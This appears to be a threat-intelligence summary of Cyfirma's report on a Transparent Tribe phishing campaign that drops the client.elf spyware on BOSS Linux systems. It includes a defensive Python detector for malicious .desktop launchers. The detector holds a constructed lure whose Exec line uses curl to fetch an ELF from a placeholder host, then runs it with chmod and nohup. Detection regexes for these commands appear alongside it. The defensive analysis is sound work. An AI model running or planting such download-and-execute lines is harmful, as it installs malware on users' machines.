2025-08-14

Transparent Tribe Targets Indian Sectors with New BOSS Linux Espionage Campaign

Level: Tactical | Source: Cyfirma | Sectors: Critical Infrastructure, Defense, Government


An ongoing cyber-espionage operation by Transparent Tribe (also tracked as APT36, COPPER FIELDSTONE, Mythic Leopard, and ProjectM) was discovered and reported by Cyfirma. The group, attributed to state-sponsored operations, has expanded its focus to Linux environments, specifically systems running BOSS Linux, a distribution commonly deployed across Indian government agencies. Cyfirma raised concerns about the threat this poses to organizations in India's critical infrastructure, defense, and government sectors. The motive remains consistent with the group's previous activity: espionage, persistent access, and exfiltration of sensitive data.

The observed attack chain begins with phishing emails delivering a ZIP archive named "Cyber-Security-Advisory.zip", which contains a ".desktop" file crafted to look like a legitimate security advisory. Once executed, the file runs a sequence of commands that changes the working directory to "/tmp", downloads a PowerPoint decoy and a malicious ELF binary with "curl" from attacker-controlled infrastructure, marks the binary executable with "chmod +x", and launches it silently in the background with "nohup". The domain "sorlastore[.]com" used to host the payloads has historical ties to prior malware distribution campaigns. As Cyfirma reports, "This domain, along with several associated subdomains, has been leveraged in a range of targeted attacks, particularly against personnel and systems within the Indian defense sector." Because the PowerPoint document opens as a decoy while the payload installs and runs, the user has little reason to suspect anything, and initial compromise is achieved with minimal chance of detection.
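As an added defender-side example (not code from the original page or from Cyfirma), the following Python parses a .desktop launcher and flags the Exec= pattern described above: a shell wrapper that moves into /tmp, fetches with curl, runs chmod +x and detaches with nohup. The payload host in the constructed sample is a placeholder, not the reported domain, and the indicator names and scoring threshold are assumptions of this example.

```python
import re
from configparser import ConfigParser, ParsingError

# Indicators taken from the lure behaviour described above: a .desktop Exec=
# entry that wraps a shell, cds into /tmp, downloads with curl, chmod +x's the
# payload and detaches it with nohup.
INDICATORS = {
    "shell_wrapper": re.compile(r"\b(ba)?sh\s+-c\b"),
    "tmp_workdir": re.compile(r"\bcd\s+/tmp\b"),
    "curl_download": re.compile(r"\b(curl|wget)\b"),
    "chmod_exec": re.compile(r"\bchmod\s+\+?x\b"),
    "nohup_background": re.compile(r"\bnohup\b"),
}

def parse_desktop(text: str) -> dict:
    """Return the [Desktop Entry] keys of a .desktop file ({} if malformed)."""
    cp = ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep key case: Exec, Name, Comment
    try:
        cp.read_string(text)
    except ParsingError:  # also covers a missing [Desktop Entry] header
        return {}
    return dict(cp.items("Desktop Entry")) if cp.has_section("Desktop Entry") else {}

def analyze_desktop(text: str) -> dict:
    """Score one .desktop file; 'suspicious' means three or more indicators hit."""
    entry = parse_desktop(text)
    exec_cmd = entry.get("Exec", "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(exec_cmd)]
    # A launcher whose Name/Comment claims to be a document but whose Exec
    # runs a shell is the decoy pattern itself, so count it as an indicator.
    label = (entry.get("Name", "") + " " + entry.get("Comment", "")).lower()
    if "shell_wrapper" in hits and any(w in label for w in ("advisory", "report", ".pdf", ".ppt")):
        hits.append("document_lure_runs_shell")
    urls = re.findall(r"https?://[^\s'\";]+", exec_cmd)
    return {"exec": exec_cmd, "indicators": hits, "urls": urls, "suspicious": len(hits) >= 3}

# Constructed sample modelled on the reported lure; the host is a placeholder.
SAMPLE_LURE = """[Desktop Entry]
Type=Application
Name=Cyber-Security-Advisory.pdf
Comment=Security Advisory
Terminal=false
Exec=bash -c "cd /tmp; curl -s -o decoy.pptx http://payload-host.invalid/decoy.pptx; curl -s -o client.elf http://payload-host.invalid/client.elf; chmod +x client.elf; nohup ./client.elf >/dev/null 2>&1 & xdg-open decoy.pptx"
"""
# Constructed benign launcher for comparison.
SAMPLE_BENIGN = "[Desktop Entry]\nType=Application\nName=Text Editor\nExec=gedit %U\n"
```

Running `analyze_desktop` over the .desktop files extracted from inbound archives, or over `~/.local/share/applications` and `~/Desktop` on BOSS Linux hosts, gives a cheap triage signal; the extracted URLs can be fed to existing domain-reputation checks.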

Technical analysis of the malware, identified as "client.elf", revealed multiple capabilities aimed at reconnaissance, persistence, and data theft. The malware collects system information such as CPU and RAM specifications and inspects running services, including CUPS, to identify opportunities for lateral movement or persistence. Command-and-control communication is established over TCP port 12520, with the "setKeepAlive" and "setKeepAlivePeriod" functions used to keep the connection open. Reconnaissance functions include listing drives, searching files, and capturing screenshots via a Go-based library. Together these capabilities let the attackers gather intelligence and exfiltrate valuable data while keeping a low operational profile on compromised systems. Cyfirma observed that although the command-and-control server was inactive at the time of analysis, the infrastructure could be reactivated and remains a viable threat.

Cyfirma warns that Transparent Tribe's latest campaign demonstrates an advancement in targeting Linux-based environments. Their warning: "Government, defense, and critical infrastructure organizations using BOSS Linux or other Linux-based platforms should treat this threat as a high-priority concern." The malware's stealth, its use of legitimate-looking decoy files, and its capabilities for persistence and data exfiltration underline the need for hardened detection mechanisms, continuous monitoring, and comprehensive user awareness programs to mitigate the risk posed by advanced persistent threat actors.
